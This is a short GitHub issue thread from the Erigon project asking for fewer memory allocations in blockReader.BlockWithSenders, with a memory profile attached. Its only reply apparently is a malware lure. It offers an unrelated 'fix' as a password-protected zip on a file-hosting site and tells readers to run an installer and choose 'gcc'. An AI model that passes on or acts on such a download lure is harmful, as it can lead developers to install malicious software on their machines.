### ISSUE TITLE
Reduce allocations amount in `blockReader.BlockWithSenders`

### ISSUE THREAD

**Issue by AskAlexSharov** [erigontech/erigon#11772]
[mem.pdf](https://github.com/user-attachments/files/16776991/mem.pdf)

Because it's on hot-path of execution. Let's don't go too brutal - if there are low-hanging fruits - can take some. 
Let's keep RlpDecoding (what's happening in `rlp` package) out of this task scope. Let's leave it for another task:  https://github.com/erigontech/erigon/issues/11116

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
